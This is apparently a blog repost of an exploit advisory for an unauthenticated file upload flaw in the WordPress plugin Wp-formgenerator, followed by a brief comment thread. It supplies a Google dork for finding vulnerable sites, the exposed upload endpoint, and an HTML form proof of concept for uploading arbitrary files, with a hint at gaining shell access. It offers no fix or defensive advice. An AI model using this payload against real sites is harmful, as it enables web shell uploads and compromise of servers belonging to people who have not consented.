Wordpress Plugins Wp-formgenerator File Upload Vulnerabilities





#-Title: Wordpress Plugins Wp-formgenerator File Upload Vulnerabilities
#-Author: unknown
#-Date: 10/26/2015
#- Vendor : CodeCanyon
#- Link Download : codecanyon. net/item/form-generator-wordpress-form-builder/4613911
#-Google Dork: inurl:wp-content/plugins/wp-formgenerator
#- Tested on : Trusty Tahr
#- Fixed in ??
==========================================================================

Vulnerability : "/wp-content/plugins/wp-formgenerator/uploads/php"
 When Vulnerable {"files":[]}

Proof Of Concept :

Use CSRF :

<form method="POST" action="Zembut/wp-content/plugins/wp-formgenerator/uploads/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>

</form>


Shell Acces ? Here








Top Link
• Line Mod Terbaru => Here
• Penyedia Hosting Terbaik => Here
Previous
Next Post »

1 comments:

Click here for comments
Baba Baba
admin
May 12, 2017 at 7:04 PM ×

cds

Congrats bro Baba Baba you got PERTAMAX...! hehehehe...
Reply
avatar
Thanks for your comment